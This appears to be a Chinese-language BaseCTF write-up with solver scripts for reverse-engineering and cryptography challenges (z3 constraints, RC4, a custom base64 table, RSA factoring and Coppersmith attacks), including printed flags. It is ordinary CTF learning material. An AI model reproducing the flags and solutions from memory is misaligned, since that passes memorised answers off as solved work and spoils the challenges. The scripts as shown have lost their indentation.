solver.add(479 * byte_14000A668[20] + 859 * byte_14000A668[19] + 410 * byte_14000A668[18] + 399 * byte_14000A668[17] + 891 * byte_14000A668[16] + 266 * byte_14000A668[15] + 773 * byte_14000A668[14] + 624 * byte_14000A668[13] + 34 * byte_14000A668[12] + 479 * byte_14000A668[11] + 465 * byte_14000A668[10] + 728 * byte_14000A668[9] + 447 * byte_14000A668[8] + 427 * byte_14000A668[7] + 890 * byte_14000A668[6] + 570 * byte_14000A668[5] + 716 * byte_14000A668[4] + 180 * byte_14000A668[3] + 571 * byte_14000A668[2] + 707 * byte_14000A668[1] == 724203)
solver.add(556 * byte_14000A668[20] + 798 * byte_14000A668[19] + 380 * byte_14000A668[18] + 716 * byte_14000A668[17] + 71 * byte_14000A668[16] + 901 * byte_14000A668[15] + 949 * byte_14000A668[14] + 304 * byte_14000A668[13] + 142 * byte_14000A668[12] + 679 * byte_14000A668[11] + 459 * byte_14000A668[10] + 814 * byte_14000A668[9] + 282 * byte_14000A668[8] + 49 * byte_14000A668[7] + 873 * byte_14000A668[6] + 169 * byte_14000A668[5] + 437 * byte_14000A668[4] + 199 * byte_14000A668[3] + 771 * byte_14000A668[2] + 807 * byte_14000A668[1] == 688899)
solver.add(465 * byte_14000A668[20] + 898 * byte_14000A668[19] + 979 * byte_14000A668[18] + 198 * byte_14000A668[17] + 156 * byte_14000A668[16] + 831 * byte_14000A668[15] + 856 * byte_14000A668[14] + 322 * byte_14000A668[13] + 25 * byte_14000A668[12] + 35 * byte_14000A668[11] + 369 * byte_14000A668[10] + 917 * byte_14000A668[9] + 522 * byte_14000A668[8] + 654 * byte_14000A668[7] + 235 * byte_14000A668[6] + 385 * byte_14000A668[5] + 469 * byte_14000A668[4] + 231 * byte_14000A668[3] + 496 * byte_14000A668[2] + 83 * byte_14000A668[1] == 604784)
solver.add(305 * byte_14000A668[20] + 928 * byte_14000A668[19] + 260 * byte_14000A668[18] + 793 * byte_14000A668[17] + 787 * byte_14000A668[16] + 708 * byte_14000A668[15] + 758 * byte_14000A668[14] + 236 * byte_14000A668[13] + 688 * byte_14000A668[12] + 747 * byte_14000A668[11] + 711 * byte_14000A668[10] + 195 * byte_14000A668[9] + 50 * byte_14000A668[8] + 648 * byte_14000A668[7] + 787 * byte_14000A668[6] + 376 * byte_14000A668[5] + 220 * byte_14000A668[4] + 33 * byte_14000A668[3] + 194 * byte_14000A668[2] + 585 * byte_14000A668[1] == 665485)
solver.add(767 * byte_14000A668[20] + 573 * byte_14000A668[19] + 22 * byte_14000A668[18] + 909 * byte_14000A668[17] + 598 * byte_14000A668[16] + 588 * byte_14000A668[15] + 136 * byte_14000A668[14] + 848 * byte_14000A668[12] + 964 * byte_14000A668[11] + 311 * byte_14000A668[10] + 701 * byte_14000A668[9] + 653 * byte_14000A668[8] + 541 * byte_14000A668[7] + 443 * byte_14000A668[6] + 7 * byte_14000A668[5] + 976 * byte_14000A668[4] + 803 * byte_14000A668[3] + 273 * byte_14000A668[2] + 859 * byte_14000A668[1] == 727664)
solver.add(776 * byte_14000A668[20] + 59 * byte_14000A668[19] + 507 * byte_14000A668[18] + 164 * byte_14000A668[17] + 397 * byte_14000A668[16] + 744 * byte_14000A668[15] + 377 * byte_14000A668[14] + 768 * byte_14000A668[13] + 456 * byte_14000A668[12] + 799 * byte_14000A668[11] + 9 * byte_14000A668[10] + 215 * byte_14000A668[9] + 365 * byte_14000A668[8] + 181 * byte_14000A668[7] + 634 * byte_14000A668[6] + 818 * byte_14000A668[5] + 81 * byte_14000A668[4] + 236 * byte_14000A668[3] + 883 * byte_14000A668[2] + 95 * byte_14000A668[1] == 572015)
solver.add(873 * byte_14000A668[20] + 234 * byte_14000A668[19] + 381 * byte_14000A668[18] + 423 * byte_14000A668[17] + 960 * byte_14000A668[16] + 689 * byte_14000A668[15] + 617 * byte_14000A668[14] + 240 * byte_14000A668[13] + 933 * byte_14000A668[12] + 300 * byte_14000A668[11] + 998 * byte_14000A668[10] + 773 * byte_14000A668[9] + 484 * byte_14000A668[8] + 905 * byte_14000A668[7] + 806 * byte_14000A668[6] + 792 * byte_14000A668[5] + 606 * byte_14000A668[4] + 942 * byte_14000A668[3] + 422 * byte_14000A668[2] + 789 * byte_14000A668[1] == 875498)
solver.add(766 * byte_14000A668[20] + 7 * byte_14000A668[19] + 283 * byte_14000A668[18] + 900 * byte_14000A668[17] + 211 * byte_14000A668[16] + 305 * byte_14000A668[15] + 343 * byte_14000A668[14] + 696 * byte_14000A668[13] + 590 * byte_14000A668[12] + 736 * byte_14000A668[11] + 817 * byte_14000A668[10] + 603 * byte_14000A668[9] + 414 * byte_14000A668[8] + 828 * byte_14000A668[7] + 114 * byte_14000A668[6] + 845 * byte_14000A668[5] + 175 * byte_14000A668[4] + 212 * byte_14000A668[3] + 898 * byte_14000A668[2] + 988 * byte_14000A668[1] == 714759)
solver.add(220 * byte_14000A668[20] + 30 * byte_14000A668[19] + 788 * byte_14000A668[18] + 106 * byte_14000A668[17] + 574 * byte_14000A668[16] + 501 * byte_14000A668[15] + 366 * byte_14000A668[14] + 952 * byte_14000A668[13] + 121 * byte_14000A668[12] + 996 * byte_14000A668[11] + 735 * byte_14000A668[10] + 689 * byte_14000A668[9] + 998 * byte_14000A668[8] + 689 * byte_14000A668[7] + 729 * byte_14000A668[6] + 886 * byte_14000A668[5] + 860 * byte_14000A668[4] + 70 * byte_14000A668[3] + 466 * byte_14000A668[2] + 961 * byte_14000A668[1] == 778853)
solver.add(313 * byte_14000A668[20] + 748 * byte_14000A668[19] + 522 * byte_14000A668[18] + 864 * byte_14000A668[17] + 156 * byte_14000A668[16] + 362 * byte_14000A668[15] + 283 * byte_14000A668[14] + 49 * byte_14000A668[13] + 316 * byte_14000A668[12] + 79 * byte_14000A668[11] + 136 * byte_14000A668[10] + 299 * byte_14000A668[9] + 271 * byte_14000A668[8] + 604 * byte_14000A668[7] + 907 * byte_14000A668[6] + 540 * byte_14000A668[5] + 141 * byte_14000A668[4] + 620 * byte_14000A668[3] + 701 * byte_14000A668[2] + 866 * byte_14000A668[1] == 584591)
solver.add(922 * byte_14000A668[20] + 399 * byte_14000A668[19] + 425 * byte_14000A668[18] + 26 * byte_14000A668[17] + 159 * byte_14000A668[16] + 224 * byte_14000A668[15] + 438 * byte_14000A668[14] + 770 * byte_14000A668[13] + 144 * byte_14000A668[12] + 406 * byte_14000A668[11] + 110 * byte_14000A668[10] + 991 * byte_14000A668[9] + 749 * byte_14000A668[8] + 701 * byte_14000A668[7] + 646 * byte_14000A668[6] + 147 * byte_14000A668[5] + 979 * byte_14000A668[4] + 674 * byte_14000A668[3] + 999 * byte_14000A668[2] + 913 * byte_14000A668[1] == 717586)
solver.add(13 * byte_14000A668[20] + 537 * byte_14000A668[19] + 225 * byte_14000A668[18] + 421 * byte_14000A668[17] + 153 * byte_14000A668[16] + 484 * byte_14000A668[15] + 654 * byte_14000A668[14] + 743 * byte_14000A668[13] + 779 * byte_14000A668[12] + 74 * byte_14000A668[11] + 325 * byte_14000A668[10] + 439 * byte_14000A668[9] + 797 * byte_14000A668[8] + 41 * byte_14000A668[7] + 784 * byte_14000A668[6] + 269 * byte_14000A668[5] + 454 * byte_14000A668[4] + 725 * byte_14000A668[2] + 164 * byte_14000A668[1] == 537823)
solver.add(591 * byte_14000A668[20] + 210 * byte_14000A668[19] + 874 * byte_14000A668[18] + 204 * byte_14000A668[17] + 485 * byte_14000A668[16] + 42 * byte_14000A668[15] + 433 * byte_14000A668[14] + 176 * byte_14000A668[13] + 436 * byte_14000A668[12] + 634 * byte_14000A668[11] + 82 * byte_14000A668[10] + 978 * byte_14000A668[9] + 818 * byte_14000A668[8] + 683 * byte_14000A668[7] + 404 * byte_14000A668[6] + 562 * byte_14000A668[5] + 41 * byte_14000A668[4] + 789 * byte_14000A668[3] + 200 * byte_14000A668[2] + 220 * byte_14000A668[1] == 587367)
solver.add(584 * byte_14000A668[20] + 597 * byte_14000A668[19] + 928 * byte_14000A668[18] + 532 * byte_14000A668[17] + 902 * byte_14000A668[16] + 858 * byte_14000A668[15] + 820 * byte_14000A668[14] + 240 * byte_14000A668[13] + 124 * byte_14000A668[12] + 899 * byte_14000A668[11] + 848 * byte_14000A668[10] + 822 * byte_14000A668[9] + 409 * byte_14000A668[8] + 491 * byte_14000A668[7] + 587 * byte_14000A668[6] + 715 * byte_14000A668[5] + 410 * byte_14000A668[4] + 268 * byte_14000A668[3] + 721 * byte_14000A668[2] + 915 * byte_14000A668[1] == 842245)
solver.add(421 * byte_14000A668[20] + 302 * byte_14000A668[19] + 327 * byte_14000A668[18] + 180 * byte_14000A668[17] + (byte_14000A668[16] << 9) + 160 * byte_14000A668[15] + 623 * byte_14000A668[14] + 28 * byte_14000A668[13] + 411 * byte_14000A668[12] + 53 * byte_14000A668[11] + 633 * byte_14000A668[10] + 560 * byte_14000A668[9] + 623 * byte_14000A668[8] + 477 * byte_14000A668[7] + 901 * byte_14000A668[6] + 287 * byte_14000A668[5] + 149 * byte_14000A668[4] + 726 * byte_14000A668[3] + 934 * byte_14000A668[2] + 875 * byte_14000A668[1] == 610801)
solver.add(838 * byte_14000A668[20] + 434 * byte_14000A668[19] + 792 * byte_14000A668[18] + 649 * byte_14000A668[17] + 462 * byte_14000A668[16] + 170 * byte_14000A668[15] + 980 * byte_14000A668[14] + 15 * byte_14000A668[13] + 295 * byte_14000A668[12] + 495 * byte_14000A668[11] + 666 * byte_14000A668[10] + 934 * byte_14000A668[9] + 17 * byte_14000A668[8] + 69 * byte_14000A668[7] + 367 * byte_14000A668[6] + 780 * byte_14000A668[5] + 291 * byte_14000A668[4] + 834 * byte_14000A668[3] + 587 * byte_14000A668[2] + 133 * byte_14000A668[1] == 653127)
solver.add(41 * byte_14000A668[20] + 422 * byte_14000A668[19] + 420 * byte_14000A668[18] + 224 * byte_14000A668[17] + 475 * byte_14000A668[16] + 854 * byte_14000A668[15] + 233 * byte_14000A668[14] + 179 * byte_14000A668[13] + 620 * byte_14000A668[12] + 69 * byte_14000A668[11] + 42 * byte_14000A668[10] + 684 * byte_14000A668[9] + 300 * byte_14000A668[8] + 745 * byte_14000A668[7] + 894 * byte_14000A668[6] + 554 * byte_14000A668[5] + 495 * byte_14000A668[4] + 66 * byte_14000A668[3] + 316 * byte_14000A668[2] + 391 * byte_14000A668[1] == 533470)
print(solver.check())
res = solver.model()
lst = natsorted([(k, res[k]) for k in res], lambda x: str(x[0]))
for k, v in lst:
print(chr(v.as_long()), end='')
# BaseCTF{CDBBDCAAABBDBCCBCCAC}
Ezpy
python re_pyinstxtractor.py 解压文件.提示3.9版本
用3.9版本解压. pycdc查看Ezpy.pyc得到源码rc4加密.改一改跑一下
Key = type("suibian", (), {"key": 'yOU_f1nd_m3', "keykey": [66, 97, 115, 101]})
def init_Sbox(seed):
k_b = [ord(seed[i % len(seed)]) for i in range(256)]
s = list(range(256))
j = 0
for i in range(256):
j = (j + s[i] + k_b[i]) % 256
s[i], s[j] = s[j], s[i]
return s
def KeyStream(text, Sbox):
s = Sbox.copy()
i, j = 0, 0
k = [0] * len(text)
for r in range(len(text)):
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
t = (s[i] + s[j]) % 256
k[r] = s[t] ^ Key.keykey[r % len(Key.keykey)]
return k
def Encrypt(text, seed):
Sbox = init_Sbox(seed)
key = KeyStream(text, Sbox)
enc = [text[i] ^ key[i] for i in (range(len(text)))]
return bytes(enc)
enc = b'\xe6\xaeC~F\xf2\xe3\xbb\xac\x9a-\x02U\x85p\xeb\x19\xd1\xe4\xc93sG\xb0\xeb1\xb5\x05\x05\xc3\xd7\x00\x18+D\xbc\x0cO\x9em\xf1\xbd'
flag = Encrypt(enc, Key.key)
assert flag == b'BaseCTF{Y0u_kn0W_d3C0Mp1l4710N_PY_4ND_rC4}'
最简单的编码
__int64 __fastcall sub_140011CC0(__int64 a1)
{
__int64 result; // rax
int i; // [rsp+24h] [rbp+4h]
result = sub_140011389(&unk_140023015);
for ( i = 0; i < 16; ++i )
{
sub_14001119A(4 * i + a1, 4 * i + 2 + a1);
sub_14001119A(4 * i + 1 + a1, 4 * i + 3 + a1);
result = (unsigned int)(i + 1);
}
return result;
}
换表后为 CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89
_BYTE *__fastcall Base64Enc(char *Input, char *TABLE, unsigned int slen, _DWORD *arr)
{
...
InputTmp = (s1 << 16) + s3 + (v12 << 8);
buf[j] = TABLE[(*arr + (InputTmp >> 18)) & 0x3F];// ch0 = T[c1前6位]
p2 = j + 1;
buf[p2] = TABLE[(arr[1] + (InputTmp >> 12)) & 0x3F];// T[c6-12]
buf[++p2] = TABLE[(arr[2] + (InputTmp >> 6)) & 0x3F];// T[c12-18]
buf[++p2] = TABLE[(arr[3] + InputTmp) & 0x3F];// T[c18-24]
j = p2 + 1;
}
for ( i = 0i64; i < (3 - slen % 3) % 3; ++i )
buf[v6 - 1 - i] = 61;
buf[v6] = 0;
return buf;
}
// 在替换新表的时候 加上了 arr数组[1,2,3,4]进行偏移, 索引回去换表解.
en_cipher = "TqK1YUSaQryEMHaLMnWhYU+Fe0WPenqhRXahfkV6WE2fa3iRW197Za62eEaD"
import base64
STD_BASE64CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
my_base64chars = "CDABGHEFKLIJOPMNSTQRWXUVabYZefcdijghmnklqropuvstyzwx23016745+/89"
k = [1, 2, 3, 4]
lst = []
for i, c in enumerate(en_cipher):
idx = my_base64chars.index(c) - k[i % 4] % len(my_base64chars)
x = my_base64chars[idx]
lst.append(x)
cipher = ''.join(lst).translate(str.maketrans(my_base64chars, STD_BASE64CHARS))
data = base64.b64decode(cipher)
print(data)
# BaseCTF{B45E64_eNCoDIn9_I5_rE4LLY_7OO_5implE}
[Week2] RivestCipher
BaseCTF
0ebb0c573dd548f3d2b2525f02895cd5275b6f6e5776538982ea41246dae8517
BaseCTF{go1@ng_!S_RuNNin9_RC4}
Crypto
[Week2] basic
import base64
import libnum
from Crypto.Util.number import *
from pwn import *
context.log_level = "debug"
r = remote("challenge.basectf.fun", 27457)
for i in range(100):
choice = r.recvuntil(b"\n").replace(b"\n", b"")
secret = r.recvuntil(b"\n").replace(b"\n", b"")
if choice == b"A":
r.sendline(base64.b64decode(secret))
if choice == b"B":
r.sendline(libnum.n2s(int(secret, 16)))
if choice == b"C":
r.sendline(libnum.n2s(int(secret)))
if choice == b"D":
result = ''
for i in secret.replace(b"[", b"").replace(b"]", b"").split(b","):
result += chr(int(i))
r.sendline(result.encode())
r.interactive()
[Week2] two_squares
平方和求解
two_squares(209479773119142584969854470862023704936857416491817498021871883305658177375498)
e = 65537
c = 42330675787206041757903427737108553993012805007294570657461042152628982126538
x = 209479773119142584969854470862023704936857416491817498021871883305658177375498
p, q = two_squares(x)
n = p * q
# init p q e c
from Crypto.Util.number import long_to_bytes, bytes_to_long
def decrypt_rsa():
import gmpy2
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
decrypt_rsa()
然后求RSA BaseCTF{0760becd-cefaab0b094d}
[Week2] 铜匠
BaseCTF{7074ddc3e006810688241196414e49e2}
高低位
from Crypto.Util.number import *
from gmpy2 import *
e = 65537
c = 15659576879410368237140555530527974801613150473447768911067611094143466009251385693099110691602954207905029692682380253595062935017486879899242785756448973466690818942065250284891341066578689696180061755610538867770441139827574063212967027249650509215685566103350688284041405586915563454117672061141919712416360596137520514412607512596079964611672166435592936417138352662031529414118312166411150736015788925026636845744110093161894267707446937939130745326244186579516665160036229715964182962542836836457885170975474737620430886449029488829662146456489724775166105816909257516908496172172266375617868819982791477888289
# sage
p1 = 14439249591349619691972392177790365247490839237199085979433418493254022567815148979672690178
q0 = 90063199151369157959005663017593053931871580139169245885113098598755909124764417
n = 18347545778876678838092757800261556931131930866012101566000425608407193858675622059415995283684230959320874387944052648148677918542763633503231962873204645415818139345588988936580526094727943067102768943117592654029397879665312089518191052154267343886226820785206334238961064175118262578895847281575656290248049404047727756356910896332939145136942219317065063060070725033146788186604738271846183709127655298440696824683099637827282095133642324657860714680107691622056420045091586609974536644773286992447027164350612852922016376888380895187804771279035652496676089183636450028327097084911908336202253562671798012457461
p0 = n * invert(q0, 2 ^ 266) % (2 ^ 266)
pbar = (p1 << 721) + p0
PR.<x> = PolynomialRing(Zmod(n))
for i in range(64):
f = pbar + x * (2 ^ 266) * 64 + i * (2 ^ 266)
f = f.monic()
pp = f.small_roots(X=2 ^ 453, beta=0.4)
if (pp):
print("pp[0]=", pp[0])
print("i=", i)
break
p = pbar + pp[0] * 64 * (2 ^ 266) + i * (2 ^ 266)
print("p=", p)
###decry###
p= int(p)
q = n // p
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
print(m)
print(long_to_bytes(m))
[Week2] random_primes
算欧拉
n = 78300669134090137852678272985826748552135227276632141248987049792032006306302216838913764274866303353208450204056303587307590215658369546155011362928706987241738494219541640893624036978156512506828463680671263486243620357332029975262649036988429673099480612452108805474703908926666372276084227948945557265663478215385708377783788570365632616043692339165126905185780780266966306548390661933964569191558132570743049563034138454687784280737515786647554373002062073506433019576711216881997114922882459590300118573321037403610889041169358378723253785685185468195113769538654602557963324567374538144099228383454092513581001676844948371535253876783418313588527754932166605066901072445123419390582818421290114496685300926300428214457517990285819930164112928731952543551128353453115448896272534889430898972420106066951673716649898254901175990616932072274131352817500432771246120044877003878221635833566879303044541045834038388997926347179939044765998585225912825579716411592564742018931576637831147018364052669287568321730785094397048548966924521616592554123755297954204221563101170233500051950508111908253332306439556638016218903032470713009804240601585082087048162066169084662644707376647151608352036058459491394516846894878416951958668053255135013274125427380981145860643060541753558111657169642936860264070256441807766713460296249602643758686033797758071121020245797758472562524923801634553187959279204425077723939301840341779998492203869115635533331664608105795918593153796830400602836307602218542060655621724654663459491663959746624660378618696497713505280314029154654750144247111545203758654611758984447921004347657793617842564871769622784844341157861486787088384957424536581508067582989224734241742351249915951485225249670040001204171856547596397427658888879993013652971335861824416084725435327931256774534973698438003593122194474117269397752225948596514379988893089239094703410940035417268946100231522267605729519374566776171026410423486906556493370843386314649478106704968479881781695360132024826936593194324539644886241562342997299649076507105518992946223028855705189458007533521138703343150937158114114218932400728424949936286443583797118636171187082834662757985896337364138817400612718422265665198024836586611857266616428913152399750688461692677751727389476785588380514444593900569311496880422405988762554852121131345538798688587092154717384294801026132314002251890156123191210398076704434510182202143578810771596233936298462366674592585338029819643973999567268938697218329734244529139548760101393715777276776940762681748317493543343685273831243829694914274003574509516149595004243952747746644961308054952235256037171151695870643020625268635139422461824974663101258586488528601193378268634713686606488503649923013225514905688326248009253372769118830036659383418890729585564557376820890036155588551064419189532686009173215470250197488274429655669070803391973941917017493224972246331391152287082983301776505925295294164201606063028946348118492358755684668733095242911870636074134633575423928967453742150728552560370847186174905012586984090885433727025000206871702482359563400504600567763564582739694873656581728461491373440639163666040518508819641244084238867282549191870081112768586762540287977817548140346798817430775010275964061529114139424317686620296832033309265702409802876815255731607798400127673166880859281784259402995434972992131101158600882460475931695668710417351337637612478180964570698492610372677176847071937542439765750578751925220375723373827393178629810215549480885217514819316424426943459039642952096990941480059597449017550988311939357225101582029418355438775525606571176735588489070335070244453533520858832311313682516805060002632168734723995449881138047136306876918900826798316113276424022400544205104057777588615149030045126315192448561606146254432070045197349283823967140032987449249831755565764939530383006495743
e = 0x010001
c = 1093256121418811691349633884423021356633978134292966489553874542781791238358295335426668415023166027954996625051420577493667824501649432869528057686451750288316816910397382629774298441937547233956753065529097877191699918039115202957337087658469098304374696277563020457331278140075969310150315715843020746656167994646063024677105714238622574336597601173953997036582942407796229805377339006787815702404915271846770376106312644390819144016155830513829761647568620243654068928415623802444953011361211378013499713469372806125474734994287518083907329841838337717556241874324440340626885553763322954232400855565339807071892321582386180978536483407197865884342435897670134641970372091590178581326892854820705050227840462139458418313478056939546089488178689697927788133612008061739961796780717135680690059059843521460548943400440075072549263642778142322553681107266326899389399400224420049958868630481920741293895509509786744023698063926664818702849276103941412666213912301512015982875337927624885673329513416992222855651023180889148449319496283772492522626881480405730489310544315066415406419791190663101607618436762339809465699249346219280236246798494923574248758432354732450859901402315454165220861852940020724189284384978436094976303046718818115920223875761763369205054892082583399430768426962644539683767683622215674622364530161306440520074932775203726898254313918302918158338893115967835907921400822151110065285755016823481526036112086877396184474779772672777884312990976267562132296839364269838737667955289273381304280292531609850947774380025541448760290985029328831136155532030110660328741793152955524993218772392841301083853407843632521944959421101063922926408630857942155173553265649994782728054809833578075255522763473867570242922191690258610960429527917825954799350243215320860648845823888406079144360733120892758516436394283721941074591992068709056978434144249946370176209580261992712491146585486352865467853012283982569783829897373148685163663183813646084064010686825626422454984021416402862127889251773565118407053577546260937996800783904867497317512257427384881412920876851185681901360445996414854617735746124849305097724462381788049919520369827437945533718238301976608693210822883549849346914749712641177399278642094159972818771839223940037362062271618565492364129165948546330822175641999869293182574801410909568799887485687799830413460992606782188190161078789803079204468693865791568886757702397226751678303106993202727687413409748299454409517072068313199302592993167348776456703605936302216362148170559954097296263965296226759555059786981274338884349876203756741105449671416827010661253266421028866463837188482523849379185098341631154586750782372250753953789082447013115491415875557484766163997419331193733180948335725001700381759888109481542481560084404144004112246764995544553798311119720361550478239142333177065617369951724788288789091898104014990085985609531302672876148454755584802296948087896190960286862545509803680907635139069769773489974690789281850253441901658186053827023495071972754442328786102677924620742574365171969462047797683507872502560411636054630326651806741191565960549277521714122075001246821117983391397806797612028499867676071294152880791421912694378781390703123405056446531600817818157671340725736220061182015810279092548335683818151707498767164622121926625237321182816937233802267205025138008023815746402851176062360192537976175702542328058732539514446727425707394730057315691659046002877368113680075447504177622678838170749340265685373340874438362777036176293805138792214226140580946132386530852126980325547324038761178186444019589823730620635017784138099601753640268173837644549341739416563571709247391327046697023194351531203111048984847048754457714313305254115325718812624677601983165234723923006394872649966184045387413721873049174098054565879297120256469204258468893249797880459716409176351490537
primes = [255675877315683439181791416047922719357, 180461111025833129025002455435975940971,337490274732450824975483083220272824199, 304456281514261901091507788207898547903,254797576342247974393400562686432925229, 183131976400038388097951032415099792851,187104898097787470482482874168168046723, 300625339408843701719323023799725058313,293895810597575199851257228961757849961, 197370673648293754589174456296168807801,214231100175566513755789399545798257027, 299940533764670809123600295354236009687,329911008919678926860313614132444450849, 292789028093982326052555296040896616647,267992025172569093811940290026790452689, 192120589915828510906490323831586947847,208470412662206941915861109996165224771, 195723355777376859063723356742829282943,195479450259644250739997899829659598467, 225273608271867864202603965232709350643,297983612753980801299047698668400172129, 289863711883286870918208567358762217117,320181619705477005993614485764800027801, 274756647552045078797369358162815740121,208678800821922117897086572764543689257, 274510151199776127157320013074195989531,270061041585244138305865647463819178071, 231693016600939448457585159254864460211,221276763231716810367704255896280432977, 284588387935614601031451184436365997027,190107678698149330362585520776807817237, 244360771516251060479861295353775315223,184597108435320085388683362929647254859, 214993743235105601056961433866767506839,319622401044815459679561340300419077137, 312048738778225034570138647462191322423,192343262692325176379644178905323471293, 217411522139037534713431287902356703153,203269104665429435826852242437943175799, 197694542080431775212389192687346023837,170754527923440727794804968936874697237, 199565850096248778954713726823038799169,329479041983980219266962570620791190271, 336543942677902368237166971184411120319,296349049540412710059375861980880864529, 276958785496368109105253052397588113011,236061938563845834433725013690718000077, 175132351377019405283465079997063887583,210382170435243156571657554946080029177, 179295658173078371976938970235081809653,221499702407155816778095037176350210511, 273750615951477382944958796366722325273,215400010676152024850087488645214675509, 242104770580865606729511928881839588399,237832832377832763447973839385045714547, 240569613888482344825828531593242970283,188780850815328211058185207879562258749, 236351101956411494065697625496351792553,234848091988225252588700833488573195973, 216111241348931999833159262144497816823,248635261568172677022024655836676274851, 175169438550312686771927355949990675153,222945249317916941175129207081724296809, 272123250140823727659430614318422459467,321040760103571995807993446246308239643, 244443756627073674223172405572152750757,231281757931881868821441147678670578293, 212608548905981265953338769409211557953,262334849743113291736207517444943890093, 221968375825210657749121344978372971509,284590253068157230941830678792449649633, 300977729071492709020945132474829506297,305429273614180801706392853095181679257, 335939257455017842008237083398243135951,294393337682220551877311202846160164539, 300751607582285572452649226924384213987,177342562402002655670186066181715938647, 314293624358674993004107306426510931177,192176341797009660053769692734114433539, 219685065300219568101641511794459670373,311600604660297404708381142674858758433, 189258688382892886748712093669349354607,265765352209342630144326504781080544103, 233694355945946803066419059858430846563,223443907562486442160842066195579310831, 182987294835928563972108625144731142337,214137187246441738588307243392955884313, 251175687278238637206326829923211055529,280606397834257483599650477170805542213, 233315167891969517243554909836441514543,189298893622248669462727814260415085983, 248568957395290350328195179867090245057,292645643756069284722532228739967572339, 179447399460747583275629697319304390429,179645924152591342445122478862459911921, 332356391092472452305991116186146584177,245901581082639772431455170863897420347, 205817781083003905754490509387056092343,240380627852067724273161876175750141361, 268700167965406311300179029348879484383,213345040113356686319409599805587957227, 251674200978198716465773971152251242983,179180641720352444750737502831482762429, 306320532661676131438858609804319013343,256526510096408769263055362633154848279, 205959060854084755092268947433148347151,291927192797043538420569211955680836527, 204978877621419749982721876460562600659,332399656527167823296930534887330184167, 280595736375324905544725725979456898547,300213915091486506011056425480272542643, 318558817334795356700066397524785435681,319436460864579377450478049744976231249, 243133148342749788432705330633449318989,322207542584548294558453923911981520623, 320850760899167598764295789802781069077,319881693868123342340868542828982909581, 206495732343577870213482544631201066371,242791194590408310278390962600348350913, 251698935174714138851501858575403291023,336741296937713120832285756167770151171, 315930741679982320652758472398428972349,308738538640639393614807292598596283683, 242935142876894679332147837418000898919,320412254452324446540182603262368766623, 244141238875170898148081089385979949403,213402860730186872545578995830820087021, 257839149567099022202819187898373109541,205790643921760418513647126480621419031, 198756405484996593521220520853141427989,294805620517257214889752595599972901633, 255265348017204260362764409566933677153,274956788729771493245467759809121243433, 207307664273912902821847768063880326327,228782470653856387114481087524374601589, 327491405235009262853431015300186498577,173419211471119738399569200317219003511, 266492438299975532333886393820275910943,276688137488059756944807773426416608851, 189140053313243747387509835884240226891,184847492345401269770088588442458737119, 333210953053056282315216794932763359439,214889588455292527477541347807824233317, 215229626238372443203352172982941095611,321221012891336284787614820604143303369, 199400757934809114495211412464158118397,178651685535715756785532928453093603903, 220776757717693008935011794749825325367,303675938617156800143972318322678387193, 327088681522055240658148530499087069577,335783766579434559780651762543581106409, 259404300424171457987268194257725139933,179840475811181163398944717514437142491, 297175485665739288479300848974745531391,237485053681467543059304786336620370377, 297758270183402970750961370350920892967,287801215974478613717591686806352676563, 310730027586487200761300572073383664977,276935537099897424875065059267639595933, 251308797428280999427269663339682237319,217181290779624781624389434069663308189, 278483889173395237559970658394075421689,204589549925569581630736863023597052269, 226032820526239722979885626335569166693,307616487066170583892695494367464641267, 222259520009563764167811735543215104543,264617923645991453974534495741056598021, 300871024629133281254211035867737539223,170303240421348821459663263562155031807, 194456703515031789312329705897177851253,327369717787718586651743316493134914089, 313093229847313153837631186419773330871,224824444829441039679277741769033772991, 224589292446640473576473771583959436463,214868884335325091682110394113205785173, 281852933308534953139887124628766315043,225661596373287038911910532148417025369, 197435393688129783450788260536037003399,266167151841181488476394288675916455947, 179215005575751890101294918245131012843,181845510055827963079718687867786713537, 257637102334933109362889675555405989789,211635849392838491382106919488103885767, 186185061420106956824801515596528043351,285418977308105637920637161558618377271, 333320927697115374794556799401253359593,188501857269628483380021948001960729951, 333805438111531260206119448902819218463,207203219305023873959844954660799240249, 243125622633677038874854389025310242579,216464412848635515952075334791481048513, 215209416857176076836597526059188595229,214612926530046226231879587951703041239, 211839237456343309131155436452991652823,243378322702585683775212046627894119463, 300569560524099180847101362636309727649,277442530432004673254582623587364635427, 264039335285085705456044566498360689059,336941745040225044220256680095943361963, 294351957900120820634469984437616730183,193397784957516885417425615607279607259, 172625665034500456784052580259369183617,171214762299612221823796960282578324943, 194792374409055048312123241531481499583,214020514849615741103085838425694524869, 217152285242353248407824271751534124093,310504460995069986330272047239018516719, 257283037178296965441561511618312400677,196379023990504203398232036900292068109, 208338219265141175146204974249461481119,180313228114558484028748815066535513471, 293814076002148382129879416847624489347,217981245083649644743701945778358819867, 198894611219128734462943250308461071371,190754795019022912784187412387261424293, 273263914687122798746013275553691541621,319875887014797059887738138214903974573, 280433942775269696096083027024527213553,339832090471957335839878188583478605273, 245482340001475388718217992653932933781,195945871414379770821529324478394520901, 203621853598394319877751491201563422297,285527901432745514886361613743984147931, 284721811618834957831167749970526496317,327215978662725442740036051250620691291, 221299321558362891869402561537662340987,252585072729486722478056993406814970147, 280264567326332248237425051940201458271,241027648066340372998036400876879511133, 209093079608768177230455678431608454539,340235244837800791530469709812216931327, 318370869089270734010914463566452904391,218007259061353959833958121965586715759, 320702628326860753372843359167209806577,280574097974570759348625351607802595079, 228292038707075332622237132594473246261,246482905608669854259984848561724759323, 281771843261446623855706740146832822043,241444581355719829115072364769273312223, 309029268537775236744873599480649785803,293169195958605701684834829075351077843, 240056552101889027428780330876207267181,206667506718454166578882634113592471317, 295377459264316749259598713099825801289,334341534141831513237527215426279900591, 263440016933436744959242384953581131709,327921668846632014434297416582771393151, 179743859120339282852666034250891124503,212172965192102954961276830300925726343, 325170702322845184523697390427992449689,271105603309076479942153666379400527383, 271642757529104184378772507234018239527,244844048330592276234702305193952823371, 270007525941420385852467420335121485863,290899364033417721623974853950097454643, 279919385326960469749295500025219756669]
print(len(primes))
tmp_n=n
new_list = []
for k in range(999):
for prime in primes:
# 判断n能够被i整除
if tmp_n % prime == 0:
new_list.append(prime)
tmp_n = tmp_n // prime
print(new_list)
print(len(new_list))
cal_n = 1
for one in new_list:
cal_n *= one
